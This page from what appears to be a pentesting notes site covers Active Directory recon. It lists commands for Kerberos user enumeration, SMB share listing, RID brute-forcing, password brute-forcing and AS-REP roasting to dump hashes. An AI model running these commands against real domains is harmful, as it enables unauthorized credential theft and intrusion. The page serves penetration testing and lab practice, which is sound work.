TurboWindX
  • Welcome
  • Hacking Methodologies
    • Known Tools & Technologies
    • Kill Chain
    • Phyisical and hardware
      • Full Screen Escape
  • Checklist - WebApps
  • Checklist - Windows
  • External Recon
    • Ports & services scanning
    • Web Recon
      • CMS
        • Wordpress
      • Path traversal & LFI/RFI
      • XSS - Cross site scripting
      • XML External Entity - XXE
  • Internal Recon
    • Active Directory
  • Post Exploitation
    • Container/Sandbox Breakout
    • Privilege Escalation
      • Hashing & Cracking
    • Persistence
      • Windows
    • Data Exfiltration
      • Steganography
      • Pivot & Tunneling
  • Shells
  • Protocols
    • FTP
    • SSH
    • DNS
    • IPP
  • Binary Exploitation
    • Linux - Simple reverse & crack
  • Memory Analysis
  • Forensics
  • Android & iOS
  • Database Injection & Exploitation
  • DDoS
  • Kubernetes & Docker
  • Phish
Powered by GitBook
On this page
  • Enumeration
  • Kerberos & Smb

Was this helpful?

  1. Internal Recon

Active Directory

PreviousInternal ReconNextPost Exploitation

Last updated 3 years ago

Was this helpful?

Enumeration

Recon first using any port scanning tool.

Kerberos & Smb

Try to gather as much info possible. I usually start by brute forcing some users. But if we already know some creds, get to listing

#no user, no creds
kerbrute userenum --dc DC.machine-A.local -d machine-A.local userlist.txt

#with creds
smbclient -L \\\\<ip> -U user -p pass #list
smbclient \\\\10.10.188.12\\Share -U user -p pass #specific share

smbmap -u user -p pass -R <share> -H <IP> -P <port> #works better for enum sometimes

smbclient \\\\<ip>\\JuicyShare -U user@domain.local #interactive

Then, I check if any account is active with smbmap, smbclient, or crackmapexec. Using crackmapexec we can also bruteforce the RIDs.

#if guest account is available, no pass, rid bruteforcing
crackmapexec smb DC.machine-A.local -u 'guest' -p '' --rid-brute

You can then put all the (SidTypeUser) into a list and try to exploit Kerberos pre-authentication mechanisms and hopefully dump some hashes.

python impacket/GetNPUsers.py <domain-name>/ -usersfile user.txt -no-pass -dc-ip <dc-ip>
python3 impacket/GetNPUsers.py "domain.local/User:Pass" 

If any other user come out, that is just great, you can now maybe bruteforce a login if there is lockout or any other anti-bruteforce mechanism. You can also do this with crackmapexec

crackmapexec smb DC.machine-A.local -u 'DnsAdmins' -p passwordlist

Snippet of other users found